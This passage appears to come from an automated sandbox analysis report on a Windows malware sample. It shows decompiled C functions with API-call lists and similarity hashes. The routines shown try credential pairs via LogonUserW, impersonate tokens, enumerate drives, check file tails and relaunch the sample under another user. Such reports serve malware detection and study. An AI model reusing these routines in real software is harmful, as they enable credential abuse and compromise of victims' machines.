                                                                                        0x00402024
                                                                                        0x0040203b
                                                                                        0x00402042
                                                                                        0x00402053
                                                                                        0x0040205b
                                                                                        0x0040205d
                                                                                        0x00402060
                                                                                        0x00402061
                                                                                        0x00402063
                                                                                        0x00402063
                                                                                        0x00402068
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040207c
                                                                                        0x0040207f
                                                                                        0x00402082
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00402082
                                                                                        0x00402073
                                                                                        0x00402073
                                                                                        0x00402084
                                                                                        0x0040208f
                                                                                        0x0040208f
                                                                                        0x004020a0

                                                                                        APIs
                                                                                        • NtQueryInformationToken.NTDLL(?,00000002,?,00000004,?), ref: 00402024
                                                                                        • RtlAllocateHeap.NTDLL(00000008,?), ref: 00402035
                                                                                        • NtQueryInformationToken.NTDLL(?,00000002,00000000,?,?), ref: 00402053
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 0040208F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: HeapInformationQueryToken$AllocateFree
                                                                                        • String ID:
                                                                                        • API String ID: 3129818708-0
                                                                                        • Opcode ID: 6b934a7c4723fc65dd6ac94149b55f2cd4126db01ad4abc1f488d9e441de1e46
                                                                                        • Instruction ID: d1d79e42df92fa8735640151846709503bd13b6252c6febf841f31e72f1c97b0
                                                                                        • Opcode Fuzzy Hash: 6b934a7c4723fc65dd6ac94149b55f2cd4126db01ad4abc1f488d9e441de1e46
                                                                                        • Instruction Fuzzy Hash: 64115B72900208FFEB208F90DD49FAEBB78EB04311F0080B6EA11B61B0D7B65A48DB54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040221B, Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E0040221B() {
				void* _v8;
				short _v264;
				wchar_t* _t14;
				signed int _t15;
				wchar_t* _t21;
				wchar_t* _t22;
				void* _t23;
				void* _t25;

				_v8 = 0;
				_t22 =  *0x40f5ca; // 0x0
				while(1) {
					wcscpy( &_v264, _t22);
					_t14 = wcschr( &_v264, 0x3a);
					_t25 = _t23 + 0x10;
					_t21 = _t14;
					if(_t21 == 0) {
						goto L4;
					}
					 *_t21 = 0;
					_t5 =  &(_t21[0]); // 0x2
					if(LogonUserW( &_v264, 0, _t5, 4, 0,  &_v8) == 0) {
						goto L4;
					} else {
					}
					L7:
					return _v8;
					L4:
					_t15 = wcslen(_t22);
					_t23 = _t25 + 4;
					_t22 = _t22 + 2 + _t15 * 2;
					if( *_t22 != 0) {
						continue;
					} else {
					}
					goto L7;
				}
			}











                                                                                        0x00402229
                                                                                        0x00402230
                                                                                        0x00402236
                                                                                        0x0040223e
                                                                                        0x00402250
                                                                                        0x00402256
                                                                                        0x00402259
                                                                                        0x0040225d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040225f
                                                                                        0x0040226c
                                                                                        0x00402281
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00402283
                                                                                        0x0040229d
                                                                                        0x004022a8
                                                                                        0x00402285
                                                                                        0x00402286
                                                                                        0x0040228c
                                                                                        0x0040228f
                                                                                        0x00402297
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00402299
                                                                                        0x00000000
                                                                                        0x00402297

                                                                                        APIs
                                                                                        • wcscpy.NTDLL ref: 0040223E
                                                                                        • wcschr.NTDLL ref: 00402250
                                                                                        • LogonUserW.ADVAPI32(?,00000000,00000002,00000004,00000000,00000000), ref: 00402279
                                                                                        • wcslen.NTDLL ref: 00402286
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: LogonUserwcschrwcscpywcslen
                                                                                        • String ID:
                                                                                        • API String ID: 77989123-0
                                                                                        • Opcode ID: dc340d6d3e73c6da2fd94945512381a75e7c7855182f97008de3c7caec22c087
                                                                                        • Instruction ID: 1f90d4305b6831fd899317fec0e93dc63310a76d1126cb4740fbbbd9239c647d
                                                                                        • Opcode Fuzzy Hash: dc340d6d3e73c6da2fd94945512381a75e7c7855182f97008de3c7caec22c087
                                                                                        • Instruction Fuzzy Hash: 960188B1500214ABD720DBD4EE49FA673BCEF44310F5001BAFA05F71D0E7B59A5987AA
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00407EFB, Relevance: 6.0, APIs: 4, Instructions: 50memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00407EFB() {
				long _v8;
				void* _v12;

				if( *0x40f5ea != 0) {
					E00401AE1( *0x40f5ea);
				}
				_v12 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_v12 = RtlAllocateHeap( *0x40f5d6, 8, _v8 * 2);
				if(_v12 != 0 && GetUserNameW(_v12,  &_v8) == 0) {
					RtlFreeHeap( *0x40f5d6, 0, _v12);
					_v12 = 0;
				}
				if( *0x40f5ea != 0) {
					E00401B60();
				}
				return _v12;
			}





                                                                                        0x00407f0d
                                                                                        0x00407f15
                                                                                        0x00407f15
                                                                                        0x00407f1a
                                                                                        0x00407f21
                                                                                        0x00407f2e
                                                                                        0x00407f4d
                                                                                        0x00407f54
                                                                                        0x00407f72
                                                                                        0x00407f78
                                                                                        0x00407f78
                                                                                        0x00407f86
                                                                                        0x00407f88
                                                                                        0x00407f88
                                                                                        0x00407f98

                                                                                        APIs
                                                                                        • GetUserNameW.ADVAPI32(00000000,00000000), ref: 00407F2E
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00407F47
                                                                                        • GetUserNameW.ADVAPI32(00000000,00000000), ref: 00407F5D
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00407F72
                                                                                          • Part of subcall function 00401AE1: NtDuplicateToken.NTDLL(q@,0000000C,?,00000000,00000002,00000000), ref: 00401B2B
                                                                                          • Part of subcall function 00401AE1: NtSetInformationThread.NTDLL(000000FE,00000005,005C003F,00000004), ref: 00401B3F
                                                                                          • Part of subcall function 00401AE1: NtClose.NTDLL(005C003F), ref: 00401B4D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: HeapNameUser$AllocateCloseDuplicateFreeInformationThreadToken
                                                                                        • String ID:
                                                                                        • API String ID: 2107901798-0
                                                                                        • Opcode ID: 25b5823d5ebd4866a3a75bd7b7b4197738dbfe412c23cd668c496383f58b7cd3
                                                                                        • Instruction ID: 78f9a7b40b181f204d846800204ce906ded57a62196d74910c9203039bce1971
                                                                                        • Opcode Fuzzy Hash: 25b5823d5ebd4866a3a75bd7b7b4197738dbfe412c23cd668c496383f58b7cd3
                                                                                        • Instruction Fuzzy Hash: E1110971A04208FFEB20DFA4ED49BAE7BB8FB44315F104176E404B16E0D7792A49DB59
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004055D1, Relevance: 4.5, APIs: 3, Instructions: 46memorynativeCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 75%
                                                                                        			E004055D1() {
				long _t29;
				void* _t32;
				void* _t38;
				void* _t41;
				intOrPtr* _t50;
				void* _t53;
				void* _t55;
				void* _t58;

				while(1) {
					_t29 = NtQueryObject(0, 3,  *(_t55 - 0xc),  *(_t55 - 0x10), _t55 - 0x10);
					if(_t29 == 0) {
						break;
					}
					if(_t29 != 0xc0000004) {
						return RtlFreeHeap( *0x40f5d6, 0,  *(_t55 - 0xc));
					} else {
						 *(_t55 - 0x10) =  *(_t55 - 0x10) + 0x28;
						 *(_t55 - 0xc) = RtlReAllocateHeap( *0x40f5d6, 0,  *(_t55 - 0xc),  *(_t55 - 0x10));
						continue;
					}
					L17:
				}
				_t50 = _t55 - 0x1c;
				 *_t50 = 0x690046;
				 *((intOrPtr*)(_t50 + 4)) = 0x65006c;
				 *(_t50 + 8) = 0;
				_t53 =  *(_t55 - 0xc);
				asm("lodsd");
				 *(_t55 - 8) = _t29;
				_t41 = 0;
				while(1) {
					_t32 =  *0x40f694( *((intOrPtr*)(_t53 + 4)), _t50);
					_t58 = _t58 + 8;
					if(_t32 == 0) {
						break;
					}
					_t53 = (( *(_t53 + 2) & 0x0000ffff) + 0x00000003 & 0xfffffffc) + _t53 + 0x60;
					_t41 = _t41 + 1;
					 *(_t55 - 8) =  *(_t55 - 8) - 1;
					if( *(_t55 - 8) != 0) {
						continue;
					}
					L16:
					RtlFreeHeap( *0x40f5d6, 0,  *(_t55 - 0xc));
					return  *(_t55 - 4);
					goto L17;
				}
				_t38 = E004016D2();
				if(_t38 < 0x3f) {
					if(_t38 < 0x3d) {
						 *(_t55 - 4) = _t41 + 1;
					} else {
						 *(_t55 - 4) = _t41 + 2;
					}
				} else {
					 *(_t55 - 4) =  *(_t53 + 0x52) & 0x000000ff;
				}
				goto L16;
			}











                                                                                        0x00405591
                                                                                        0x0040559f
                                                                                        0x004055a7
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004055b2
                                                                                        0x004055ec
                                                                                        0x004055b4
                                                                                        0x004055b4
                                                                                        0x004055cc
                                                                                        0x00000000
                                                                                        0x004055cc
                                                                                        0x00000000
                                                                                        0x004055b2
                                                                                        0x004055ef
                                                                                        0x004055f2
                                                                                        0x004055f8
                                                                                        0x004055ff
                                                                                        0x00405606
                                                                                        0x00405609
                                                                                        0x0040560a
                                                                                        0x0040560d
                                                                                        0x0040560f
                                                                                        0x00405613
                                                                                        0x00405619
                                                                                        0x0040561e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405652
                                                                                        0x00405656
                                                                                        0x00405657
                                                                                        0x0040565e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405660
                                                                                        0x0040566b
                                                                                        0x0040567c
                                                                                        0x00000000
                                                                                        0x0040567c
                                                                                        0x00405620
                                                                                        0x00405628
                                                                                        0x00405636
                                                                                        0x00405643
                                                                                        0x00405638
                                                                                        0x0040563b
                                                                                        0x0040563b
                                                                                        0x0040562a
                                                                                        0x0040562e
                                                                                        0x0040562e
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • NtQueryObject.NTDLL(00000000,00000003,?,00000400,00000400), ref: 0040559F
                                                                                        • RtlReAllocateHeap.NTDLL(00000000,?,00000028), ref: 004055C6
                                                                                        • _wcsicmp.NTDLL ref: 00405613
                                                                                        • RtlFreeHeap.NTDLL(00000000,?), ref: 0040566B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocateFreeObjectQuery_wcsicmp
                                                                                        • String ID:
                                                                                        • API String ID: 326895873-0
                                                                                        • Opcode ID: 7e047ba1f7b80056da61d2c169b64ff700b03b9e6aa90c013a3f3bb26027f0b2
                                                                                        • Instruction ID: 760c0ab6b5da79ca24c1f56f49ae2f4bada72efd6e1d134c9aa42d933db78585
                                                                                        • Opcode Fuzzy Hash: 7e047ba1f7b80056da61d2c169b64ff700b03b9e6aa90c013a3f3bb26027f0b2
                                                                                        • Instruction Fuzzy Hash: 29019E31904A05FFDB108F90DD44B6EBB76EF04305F50487BE519B65A0E33A551A9F1A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004055AB, Relevance: 4.5, APIs: 3, Instructions: 46memorynativeCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 75%
                                                                                        			E004055AB() {
				long _t29;
				void* _t32;
				void* _t38;
				void* _t41;
				intOrPtr* _t50;
				void* _t53;
				void* _t55;
				void* _t58;

				while(1) {
					_t29 = NtQueryObject(0, 3,  *(_t55 - 0xc),  *(_t55 - 0x10), _t55 - 0x10);
					if(_t29 == 0) {
						break;
					}
					if(_t29 != 0xc0000004) {
						return RtlFreeHeap( *0x40f5d6, 0,  *(_t55 - 0xc));
					} else {
						 *(_t55 - 0x10) =  *(_t55 - 0x10) + 0x28;
						 *(_t55 - 0xc) = RtlReAllocateHeap( *0x40f5d6, 0,  *(_t55 - 0xc),  *(_t55 - 0x10));
						continue;
					}
					L17:
				}
				_t50 = _t55 - 0x1c;
				 *_t50 = 0x690046;
				 *((intOrPtr*)(_t50 + 4)) = 0x65006c;
				 *(_t50 + 8) = 0;
				_t53 =  *(_t55 - 0xc);
				asm("lodsd");
				 *(_t55 - 8) = _t29;
				_t41 = 0;
				while(1) {
					_t32 =  *0x40f694( *((intOrPtr*)(_t53 + 4)), _t50);
					_t58 = _t58 + 8;
					if(_t32 == 0) {
						break;
					}
					_t53 = (( *(_t53 + 2) & 0x0000ffff) + 0x00000003 & 0xfffffffc) + _t53 + 0x60;
					_t41 = _t41 + 1;
					 *(_t55 - 8) =  *(_t55 - 8) - 1;
					if( *(_t55 - 8) != 0) {
						continue;
					}
					L16:
					RtlFreeHeap( *0x40f5d6, 0,  *(_t55 - 0xc));
					return  *(_t55 - 4);
					goto L17;
				}
				_t38 = E004016D2();
				if(_t38 < 0x3f) {
					if(_t38 < 0x3d) {
						 *(_t55 - 4) = _t41 + 1;
					} else {
						 *(_t55 - 4) = _t41 + 2;
					}
				} else {
					 *(_t55 - 4) =  *(_t53 + 0x52) & 0x000000ff;
				}
				goto L16;
			}











                                                                                        0x00405591
                                                                                        0x0040559f
                                                                                        0x004055a7
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004055b2
                                                                                        0x004055ec
                                                                                        0x004055b4
                                                                                        0x004055b4
                                                                                        0x004055cc
                                                                                        0x00000000
                                                                                        0x004055cc
                                                                                        0x00000000
                                                                                        0x004055b2
                                                                                        0x004055ef
                                                                                        0x004055f2
                                                                                        0x004055f8
                                                                                        0x004055ff
                                                                                        0x00405606
                                                                                        0x00405609
                                                                                        0x0040560a
                                                                                        0x0040560d
                                                                                        0x0040560f
                                                                                        0x00405613
                                                                                        0x00405619
                                                                                        0x0040561e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405652
                                                                                        0x00405656
                                                                                        0x00405657
                                                                                        0x0040565e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405660
                                                                                        0x0040566b
                                                                                        0x0040567c
                                                                                        0x00000000
                                                                                        0x0040567c
                                                                                        0x00405620
                                                                                        0x00405628
                                                                                        0x00405636
                                                                                        0x00405643
                                                                                        0x00405638
                                                                                        0x0040563b
                                                                                        0x0040563b
                                                                                        0x0040562a
                                                                                        0x0040562e
                                                                                        0x0040562e
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • NtQueryObject.NTDLL(00000000,00000003,?,00000400,00000400), ref: 0040559F
                                                                                        • RtlReAllocateHeap.NTDLL(00000000,?,00000028), ref: 004055C6
                                                                                        • _wcsicmp.NTDLL ref: 00405613
                                                                                        • RtlFreeHeap.NTDLL(00000000,?), ref: 0040566B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocateFreeObjectQuery_wcsicmp
                                                                                        • String ID:
                                                                                        • API String ID: 326895873-0
                                                                                        • Opcode ID: afec9a4218ff9c831d752a56371dd012f059887f93db8aa9a3e8330b526c3806
                                                                                        • Instruction ID: 760c0ab6b5da79ca24c1f56f49ae2f4bada72efd6e1d134c9aa42d933db78585
                                                                                        • Opcode Fuzzy Hash: afec9a4218ff9c831d752a56371dd012f059887f93db8aa9a3e8330b526c3806
                                                                                        • Instruction Fuzzy Hash: 29019E31904A05FFDB108F90DD44B6EBB76EF04305F50487BE519B65A0E33A551A9F1A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00401C9B, Relevance: 4.5, APIs: 3, Instructions: 41filenativeCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00401C9B(WCHAR* _a4, void* _a8, long _a12) {
				struct _OVERLAPPED* _v8;
				void* _v12;
				long _v16;

				_v8 = 0;
				_v12 = CreateFileW(_a4, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_v12 != 0xffffffff) {
					if(WriteFile(_v12, _a8, _a12,  &_v16, 0) != 0) {
						_v8 = 1;
					}
					NtClose(_v12);
				}
				return _v8;
			}






                                                                                        0x00401ca6
                                                                                        0x00401cc8
                                                                                        0x00401ccf
                                                                                        0x00401ce8
                                                                                        0x00401cea
                                                                                        0x00401cea
                                                                                        0x00401cf4
                                                                                        0x00401cf4
                                                                                        0x00401d05

                                                                                        APIs
                                                                                        • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,?,?), ref: 00401CC2
                                                                                        • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00401CE0
                                                                                        • NtClose.NTDLL(000000FF), ref: 00401CF4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: File$CloseCreateWrite
                                                                                        • String ID:
                                                                                        • API String ID: 2708586012-0
                                                                                        • Opcode ID: ad385981a648b5fe2b05872c062b652e82e760caa543c8e3a96ab9f6936c59d3
                                                                                        • Instruction ID: 1974dd5ebe6ed98fcf9c69dfc64631ac640ae5c4b5b8df812f88ab431a2d9327
                                                                                        • Opcode Fuzzy Hash: ad385981a648b5fe2b05872c062b652e82e760caa543c8e3a96ab9f6936c59d3
                                                                                        • Instruction Fuzzy Hash: B801A471640208FFEB208F84DD49F9EBB78FB44720F204179FA14B61E0D7716A149B58
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00407D2C, Relevance: 4.5, APIs: 3, Instructions: 37nativesynchronizationCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00407D2C(void* _a4, wchar_t* _a8) {
				void* _v8;
				short _v528;
				long _t9;

				_t9 = GetModuleFileNameW(0,  &_v528, 0x104);
				if(_t9 != 0) {
					E00406C06(_a4,  &_v528, _a8, 0,  &_v8, 0);
					WaitForSingleObject(_v8, 0xffffffff);
					return NtClose(_v8);
				}
				return _t9;
			}






                                                                                        0x00407d48
                                                                                        0x00407d50
                                                                                        0x00407d67
                                                                                        0x00407d71
                                                                                        0x00000000
                                                                                        0x00407d7a
                                                                                        0x00407d88

                                                                                        APIs
                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?,?,?,00000000), ref: 00407D48
                                                                                          • Part of subcall function 00406C06: wcslen.NTDLL ref: 00406C17
                                                                                          • Part of subcall function 00406C06: wcslen.NTDLL ref: 00406C25
                                                                                          • Part of subcall function 00406C06: RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00406C40
                                                                                          • Part of subcall function 00406C06: wcschr.NTDLL ref: 00406C5E
                                                                                          • Part of subcall function 00406C06: _swprintf.NTDLL ref: 00406D1B
                                                                                          • Part of subcall function 00406C06: memset.NTDLL ref: 00406D2C
                                                                                          • Part of subcall function 00406C06: memset.NTDLL ref: 00406D3D
                                                                                          • Part of subcall function 00406C06: CreateProcessAsUserW.ADVAPI32(00000000,00000000,?,00000000,00000000,00000000,00080004,00000000,00000000,00000048,?,00000000), ref: 00406D86
                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,00408F55,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00407D71
                                                                                        • NtClose.NTDLL(00000000), ref: 00407D7A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: memsetwcslen$AllocateCloseCreateFileHeapModuleNameObjectProcessSingleUserWait_swprintfwcschr
                                                                                        • String ID:
                                                                                        • API String ID: 1334208447-0
                                                                                        • Opcode ID: 5ac6077f3af6ac1aa44279721be763aa23cd986afb219f957f31ac8be0e69585
                                                                                        • Instruction ID: 2e8e3fa4fc80ccb4d7dfb1b8bf3a49c2a4f96619ffa4aa74f04a4a0027a3174c
                                                                                        • Opcode Fuzzy Hash: 5ac6077f3af6ac1aa44279721be763aa23cd986afb219f957f31ac8be0e69585
                                                                                        • Instruction Fuzzy Hash: BAF03071504208BEEB20AB95EE4AFAA7B7CEB40721F204276FA14A10E0D6715E189B65
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00402E44, Relevance: 3.1, APIs: 2, Instructions: 142nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtQueryInstallUILanguage.NTDLL(?), ref: 00402E53
                                                                                        • NtQueryDefaultUILanguage.NTDLL(?), ref: 00402E60
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: LanguageQuery$DefaultInstall
                                                                                        • String ID:
                                                                                        • API String ID: 3486302093-0
                                                                                        • Opcode ID: 78f0727969a249eb182f1bb240e477d9712b2c1ba6864d0ed8f5fbedc8f6bafb
                                                                                        • Instruction ID: e39af1da2e6860be224d287dedfbe5131a3577809dd2bae484e6a594123721a3
                                                                                        • Opcode Fuzzy Hash: 78f0727969a249eb182f1bb240e477d9712b2c1ba6864d0ed8f5fbedc8f6bafb
                                                                                        • Instruction Fuzzy Hash: 5231DF62BC65175AFE35E014974D6E7A228A3547E0EED1173884A732C281FC0D82A6AF
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00403E86, Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00403E86() {
				short _v524;
				int _t5;
				unsigned int _t6;
				unsigned int _t7;
				WCHAR* _t8;

				_t5 = GetLogicalDriveStringsW(0x104,  &_v524);
				_t6 = _t5;
				if(_t6 != 0) {
					_t7 = _t6 >> 2;
					_t8 =  &_v524;
					do {
						_t5 = GetDriveTypeW(_t8);
						if(_t5 == 3 || _t5 == 2) {
							_t5 = E00403EDD(_t8);
						}
						_t8 =  &(_t8[4]);
						_t7 = _t7 - 1;
					} while (_t7 != 0);
				}
				return _t5;
			}








                                                                                        0x00403ea0
                                                                                        0x00403ea6
                                                                                        0x00403eaa
                                                                                        0x00403eac
                                                                                        0x00403eaf
                                                                                        0x00403eb5
                                                                                        0x00403eb6
                                                                                        0x00403ebf
                                                                                        0x00403ec7
                                                                                        0x00403ec7
                                                                                        0x00403ecc
                                                                                        0x00403ecf
                                                                                        0x00403ed0
                                                                                        0x00403eb5
                                                                                        0x00403edc

                                                                                        APIs
                                                                                        • GetLogicalDriveStringsW.KERNEL32(00000104,?,?,?,?,?,00000000), ref: 00403EA0
                                                                                        • GetDriveTypeW.KERNEL32(?,?,?,?,?,00000000), ref: 00403EB6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Drive$LogicalStringsType
                                                                                        • String ID:
                                                                                        • API String ID: 1630765265-0
                                                                                        • Opcode ID: b46be5a0fdbe81601177f82fdca0ff7374879a232e80252c26acf136bff77857
                                                                                        • Instruction ID: c7065a20642a4d2de60da224c9e94cf6a6979ade130220f2db004efeaae0ece5
                                                                                        • Opcode Fuzzy Hash: b46be5a0fdbe81601177f82fdca0ff7374879a232e80252c26acf136bff77857
                                                                                        • Instruction Fuzzy Hash: EAF027366007195BDA306A95EC89CAB7B6CCB45312B000377EE04F2180DA74AE4B85E9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00405CC1, Relevance: 3.0, APIs: 2, Instructions: 32filenativeCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 35%
                                                                                        			E00405CC1() {
				void* _t20;
				void* _t34;

				asm("sbb edx, 0x0");
				_push(2);
				if(SetFilePointerEx( *(_t34 - 8), 0xffffffffffffff70, 0, 0) != 0) {
					if(ReadFile( *(_t34 - 8), _t34 - 0x9c, 0x90, _t34 - 0xc, 0) != 0) {
						_t20 = E00401060(_t34 - 0x9c, 0x80, 0);
						_push(0x10);
						_push(_t34 - 0x1c);
						_push(_t20);
						if( *0x40f670() == 0) {
							 *((intOrPtr*)(_t34 - 4)) = 1;
						}
					} else {
						 *((intOrPtr*)(_t34 - 4)) =  *[fs:0x34];
					}
				} else {
					if( *[fs:0x34] != 0x83) {
						 *((intOrPtr*)(_t34 - 4)) =  *[fs:0x34];
					}
				}
				if( *(_t34 - 8) != 0xffffffff) {
					NtClose( *(_t34 - 8));
				}
				return  *((intOrPtr*)(_t34 - 4));
			}





                                                                                        0x00405ce0
                                                                                        0x00405ce3
                                                                                        0x00405cf4
                                                                                        0x00405d2b
                                                                                        0x00405d46
                                                                                        0x00405d4d
                                                                                        0x00405d52
                                                                                        0x00405d53
                                                                                        0x00405d5f
                                                                                        0x00405d61
                                                                                        0x00405d61
                                                                                        0x00405d2d
